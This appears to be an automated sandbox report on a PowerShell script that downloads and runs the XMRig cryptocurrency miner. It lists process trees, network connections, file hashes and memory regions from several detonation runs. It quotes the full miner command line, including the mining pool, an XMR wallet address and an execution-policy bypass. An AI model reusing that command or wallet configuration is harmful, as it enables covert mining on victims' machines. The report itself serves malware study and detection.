memory/4592-117-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-118-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-119-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:19
Platform
win10-20240404-en
Max time kernel
1788s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5116 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5116 wrote to memory of 3824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.116.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/5116-3-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/5116-5-0x00000182A8680000-0x00000182A86A2000-memory.dmp
memory/5116-6-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-9-0x00000182A8830000-0x00000182A88A6000-memory.dmp
memory/5116-10-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eyxeze3f.z25.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5116-25-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-48-0x00000182A89B0000-0x00000182A89C2000-memory.dmp
memory/5116-61-0x00000182A8810000-0x00000182A881A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3824-90-0x00000189904E0000-0x0000018990500000-memory.dmp
memory/3824-91-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/5116-92-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/5116-94-0x00007FFE943D3000-0x00007FFE943D4000-memory.dmp
memory/3824-93-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/5116-95-0x00007FFE943D0000-0x00007FFE94DBC000-memory.dmp
memory/3824-96-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-97-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-98-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-99-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-100-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-101-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-102-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-103-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-104-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-105-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-106-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-107-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-108-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-109-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-110-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-111-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-112-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-113-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-114-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-115-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-116-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-117-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-118-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-119-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-120-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-121-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-122-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-123-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-124-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-125-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-126-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-127-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-128-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-129-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-130-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-131-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-132-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-133-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-134-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-135-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-136-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-137-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-138-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-139-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-140-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-141-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-142-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-143-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-144-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-145-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-146-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-147-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-148-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-149-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-150-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-151-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-152-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-153-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-154-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-155-0x00007FF733130000-0x00007FF733D63000-memory.dmp
memory/3824-156-0x00007FF733130000-0x00007FF733D63000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:28
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3412 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3412 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4360,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4108,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3244 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
memory/3412-0-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp
memory/3412-1-0x0000024E6D1D0000-0x0000024E6D1F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1eawmjt.ol4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3412-11-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/3412-12-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/3412-14-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/3412-15-0x0000024E6D360000-0x0000024E6D372000-memory.dmp
memory/3412-16-0x0000024E6D350000-0x0000024E6D35A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4940-47-0x000002AA8C530000-0x000002AA8C550000-memory.dmp
memory/4940-48-0x000002AA8C580000-0x000002AA8C5A0000-memory.dmp
memory/4940-49-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-51-0x000002AA8DD80000-0x000002AA8DDA0000-memory.dmp
memory/4940-52-0x000002AA8DD60000-0x000002AA8DD80000-memory.dmp
memory/3412-50-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp
memory/4940-53-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/3412-54-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/4940-55-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/3412-56-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp
memory/4940-57-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-58-0x000002AA8DD80000-0x000002AA8DDA0000-memory.dmp
memory/4940-59-0x000002AA8DD60000-0x000002AA8DD80000-memory.dmp
memory/4940-60-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-61-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-62-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-63-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-64-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-65-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-66-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-67-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-68-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-69-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-70-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-71-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-72-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-73-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-74-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-75-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-76-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-77-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-78-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-79-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-80-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-81-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-82-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-83-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-84-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-85-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-86-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-87-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-88-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-89-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-90-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-91-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-92-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-93-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-94-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-95-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-96-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-97-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-98-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-99-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-100-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-101-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-102-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-103-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-104-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-105-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-106-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-107-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-108-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-109-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-110-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-111-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-112-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-113-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-114-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-115-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-116-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-117-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
memory/4940-118-0x00007FF7F9D90000-0x00007FF7FA9C3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:29
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
